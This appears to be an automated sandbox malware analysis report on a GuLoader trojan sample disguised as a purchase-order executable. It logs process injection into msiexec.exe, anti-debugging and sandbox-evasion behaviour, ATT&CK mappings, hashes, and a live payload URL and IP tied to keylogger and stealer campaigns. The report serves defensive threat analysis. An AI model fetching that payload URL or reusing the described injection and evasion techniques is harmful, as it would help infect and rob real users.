Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6420
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3191
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_00406393 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_004027FB FindFirstFileW
Source: ModuleAnalysisCache.1.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.1.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007CDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2490542175.0000000007D42000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.1.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\Desktop\PO0317011.exe | API call chain: ExitProcess graph end node (graph_0-2864)
Source: C:\Users\user\Desktop\PO0317011.exe | API call chain: ExitProcess graph end node (graph_0-3043)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Windows\SysWOW64\msiexec.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2C30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Users\user\Desktop\PO0317011.exe Code function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406072
MITRE ATT&CK matrix, grouped by tactic (the numbers are the badges shown next to a technique in the original matrix; techniques without a number were listed but not triggered):

  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
  • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
  • Execution: 1 Windows Management Instrumentation; 2 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
  • Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
  • Privilege Escalation: 1 Access Token Manipulation; 311 Process Injection; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
  • Defense Evasion: 1 Masquerading; 131 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 311 Process Injection; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
  • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
  • Discovery: 211 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 3 File and Directory Discovery; 14 System Information Discovery; Remote System Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
  • Collection: 1 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
  • Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
  • Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Antivirus detection, submitted sample (source: detection, scanner, label):
  • PO0317011.exe: 63%, Virustotal
  • PO0317011.exe: 53%, ReversingLabs, Win32.Trojan.Guloader
  • PO0317011.exe: 100%, Avira, TR/Injector.pmbgm
Antivirus detection, dropped files (source: detection, scanner, label):
  • C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exe: 100%, Avira, TR/Injector.pmbgm
  • C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exe: 53%, ReversingLabs, Win32.Trojan.Guloader
No Antivirus matches
No Antivirus matches
Antivirus detection, URLs (source: detection, scanner, label):
  • https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin: 100%, Avira URL Cloud, malware
  • https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binI#y: 100%, Avira URL Cloud, malware
  • https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bincS: 100%, Avira URL Cloud, malware
  • https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin~RU: 100%, Avira URL Cloud, malware
  • https://kenkyo.x24.eu/: 100%, Avira URL Cloud, malware
  • https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binB#: 100%, Avira URL Cloud, malware
Domains (name: IP, active, malicious, antivirus detection, reputation):
  • kenkyo.x24.eu: 5.255.110.9, active: true, malicious: false, reputation: unknown
URLs contacted (name: malicious, antivirus detection, reputation):
  • https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin: malicious: false, Avira URL Cloud: malware, reputation: unknown
URLs found in memory and binary data (name: source, malicious, antivirus detection, reputation):
  • https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binI#y: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: malware; reputation: unknown
  • http://crl.m: msiexec.exe, 0000000B.00000003.2269063976.0000000007D56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2268318114.0000000007D56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2268428595.0000000007D8A000.00000004.00000020.00020000.00000000.sdmp; malicious: false; reputation: high
  • https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin~RU: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: malware; reputation: unknown
  • http://nsis.sf.net/NSIS_ErrorError: PO0317011.exe, PO0317011.exe.1.dr; malicious: false; reputation: high
  • https://kenkyo.x24.eu/: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: malware; reputation: unknown
  • https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bincS: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: malware; reputation: unknown
  • https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binB#: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: malware; reputation: unknown
IPs (IP: domain, country, ASN, ASN name, malicious):
  • 5.255.110.9: kenkyo.x24.eu, Netherlands, ASN 60404, LITESERVERNL, malicious: false
        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1638437
        Start date and time:2025-03-14 11:56:38 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 52s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:PO0317011.exe
        Detection:MAL
        Classification:mal100.evad.winEXE@6/21@1/1
        EGA Information:
        • Successful, ratio: 50%
        HCA Information:
        • Successful, ratio: 99%
        • Number of executed functions: 34
        • Number of non-executed functions: 31
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.109.210.53
        • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target msiexec.exe, PID 7356 because there are no executed functions
• Not all processes were analyzed; report is missing behavior information
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time, type, description:
  • 06:57:42, API Interceptor: 37x Sleep call for process: powershell.exe modified
Context for IP 5.255.110.9 (associated sample name / URL: detection, threat name):
  • MG710417.exe: malicious, Azorult
  • CcaIeCqe6N.exe: malicious, GuLoader, Snake Keylogger
  • ORDER NO. MT STAR ENERGY RFQ - ATLO-SP033-24.exe: malicious, GuLoader, Snake Keylogger
  • S50MC-C_3170262-7.6cylinder_liner.exe: malicious, GuLoader, Snake Keylogger, VIP Keylogger
  • HATCH COVER REQ_AW24 New Order Request.exe: malicious, GuLoader
  • Est_US091024A - PICTURE.exe: malicious, Azorult, GuLoader
  • SwiftMesaj.pdf.exe: malicious, Azorult, GuLoader
  • Unincriminated.exe: malicious, Azorult, GuLoader
  • PO#940894.exe: malicious, Azorult, GuLoader
  • Opgaveforlb.exe: malicious, Azorult, GuLoader
Context for domain kenkyo.x24.eu (associated sample name / URL: detection, threat name, context IP):
  • MG710417.exe: malicious, Azorult, 5.255.110.9
  • CcaIeCqe6N.exe: malicious, GuLoader, Snake Keylogger, 5.255.110.9
  • ORDER NO. MT STAR ENERGY RFQ - ATLO-SP033-24.exe: malicious, GuLoader, Snake Keylogger, 5.255.110.9
  • S50MC-C_3170262-7.6cylinder_liner.exe: malicious, GuLoader, Snake Keylogger, VIP Keylogger, 5.255.110.9
  • HATCH COVER REQ_AW24 New Order Request.exe: malicious, GuLoader, 5.255.110.9
  • Est_US091024A - PICTURE.exe: malicious, Azorult, GuLoader, 5.255.110.9
  • SwiftMesaj.pdf.exe: malicious, Azorult, GuLoader, 5.255.110.9
  • Unincriminated.exe: malicious, Azorult, GuLoader, 5.255.110.9
  • PO#940894.exe: malicious, Azorult, GuLoader, 5.255.110.9
  • Opgaveforlb.exe: malicious, Azorult, GuLoader, 5.255.110.9
Context for ASN LITESERVERNL (associated sample name / URL: detection, threat name, context IP):
  • MG710417.exe: malicious, Azorult, 5.255.110.9
  • CcaIeCqe6N.exe: malicious, GuLoader, Snake Keylogger, 5.255.110.9
  • ORDER NO. MT STAR ENERGY RFQ - ATLO-SP033-24.exe: malicious, GuLoader, Snake Keylogger, 5.255.110.9
  • uEhN67huiV.dll: malicious, Unknown, 5.255.111.64
  • wkshindemips.elf: malicious, Unknown, 5.255.127.202
  • SLNA_Updated_Medical_Grant_Application(1).docx: malicious, Unknown, 5.255.125.140
  • SLNA_Updated_Medical_Grant_Application(1).docx: malicious, Unknown, 5.255.125.140
  • S50MC-C_3170262-7.6cylinder_liner.exe: malicious, GuLoader, Snake Keylogger, VIP Keylogger, 5.255.110.9
  • https://google.com/amp/s/storage.googleapis.com/49849844877/j0htjd3c57qbxqo95o8y8539efonkjievx55ax9wajxz4bsbs0i-sele6jz88a1rq45sxfmxy9judtbr3v3hrgryrc2p8a.html: malicious, Unknown, 5.255.99.94
  • XzCRLowRXn.exe: malicious, Unknown, 5.255.111.64
Context for JA3 fingerprint 37f463bf4616ecd445d4a1937da06e19 (associated sample name / URL: detection, threat name, context IP):
  • Payment slip_pdf.pif.exe: malicious, Remcos, GuLoader, 5.255.110.9
  • Portals.exe: malicious, Vidar, 5.255.110.9
  • Portals.exe: malicious, Unknown, 5.255.110.9
  • test.lnk.download.lnk: malicious, Unknown, 5.255.110.9
  • file.exe: malicious, Remcos, 5.255.110.9
  • DropboxInstaller.exe: malicious, Unknown, 5.255.110.9
  • faktura_FV2025020660849.html: malicious, Unknown, 5.255.110.9
  • ngbtiladkrthgad.exe: malicious, Vidar, 5.255.110.9
  • Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe: malicious, GuLoader, Remcos, 5.255.110.9
  • NDQ211216GM08.exe.bin.exe: malicious, GuLoader, Snake Keylogger, 5.255.110.9
                            No context
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:modified
                            Size (bytes):53158
                            Entropy (8bit):5.062687652912555
                            Encrypted:false
                            SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                            MD5:5D430F1344CE89737902AEC47C61C930
                            SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                            SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                            SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\Desktop\PO0317011.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):355958
